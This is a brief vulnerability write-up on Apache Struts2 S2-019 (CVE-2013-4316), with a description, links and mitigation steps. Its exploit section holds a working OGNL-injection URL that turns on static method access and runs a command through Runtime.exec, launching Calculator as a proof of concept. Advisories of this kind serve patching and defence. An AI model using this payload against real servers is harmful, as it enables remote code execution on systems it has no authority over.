struts2 CVE-2013-4316 S2-019 Dynamic method executions Vul

catalog

1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

 

1. Description

Dynamic Method Invocation is a mechanism known to impose possible security vulnerabilities, but until now it was enabled by default with warning that users should switch it off if possible.

Relevant Link:

http://struts.apache.org/docs/s2-019.html?spm=5176.775974950.2.8.iJuruO

2. Effected Scope
3. Exploit Analysis

0x1: POC

需要目标struts2应用开启debug模式

http://localhost:8080/crazyit/register.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField
%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,
@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29 
/*
http://localhost:8080/crazyit/register.action?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField
('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),
@java.lang.Runtime@getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator') 
*/

Relevant Link:

http://qqhack8.blog.163.com/blog/static/114147985201463194423958/
http://qqhack8.blog.163.com/blog/static/114147985201402743220859

4. Principle Of Vulnerability
5. Patch Fix

0x1: upgrade struts2

In Struts 2.3.15.2 the Dynamic Method Invocation is to false by default. Another option is to set struts.enable.DynamicMethodInvocation to false in struts.xml

<constant name="struts.enable.DynamicMethodInvocation" value="false"/>

0x2: 手动修复方法

1. 使用过滤器对相关关键字进行拦截，需要修改struts.xml，并重启struts2应用进程
2. 动态关闭struts2的属性开关(hotfix)
3. 使用waf进行URL层面的拦截

Relevant Link:

http://www.fjssc.cn/html/research/notice/2014/0127/78.html

 

Copyright (c) 2015 Little5ann All rights reserved